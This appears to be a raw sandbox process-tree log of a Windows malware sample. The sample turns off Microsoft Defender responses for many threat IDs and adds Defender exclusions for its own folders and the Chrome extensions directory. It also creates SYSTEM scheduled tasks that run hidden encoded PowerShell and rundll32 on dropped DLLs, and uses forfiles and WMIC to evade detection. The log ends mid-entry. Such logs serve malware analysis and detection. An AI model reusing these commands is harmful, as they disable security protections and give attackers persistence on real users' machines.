C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BRWHUqYPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BRWHUqYPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DsJnIJMlqPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DsJnIJMlqPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GqgEBhsSxktU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GqgEBhsSxktU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJMRwiGdhyaHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJMRwiGdhyaHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\efiAzqQKrQpqActHLvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\efiAzqQKrQpqActHLvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PdOICyyFbClqQxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PdOICyyFbClqQxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PdOICyyFbClqQxVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PdOICyyFbClqQxVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HIoTiJfsoGzpkHVf /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HIoTiJfsoGzpkHVf /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvbWNQgRn" /SC once /ST 07:40:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvbWNQgRn"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvbWNQgRn"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 06:57:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\REccKOd.exe\" 9Z /gSPsdidrc 385121 /S" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "unWjgiOqmrJvCJdsa"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 11682⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵
-
C:\ProgramData\explorer.exeC:\ProgramData\explorer.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\REccKOd.exeC:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\REccKOd.exe 9Z /gSPsdidrc 385121 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\BaByIA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\qziwqXD.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MHiaqjbnoCNpItK"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MHiaqjbnoCNpItK"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\eYRzgQi.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\HSmMYWX.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\gNySLPa.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\UutCjue.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 08:40:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\lgFYjzac\kwxfPer.dll\",#1 /LtpFdidHMt 385121" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kjGlTxIfJQSbObiUU"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\CFDUcHvi\upQWJmN.exe"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\CFDUcHvi\upQWJmN.exe" /S 7m2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
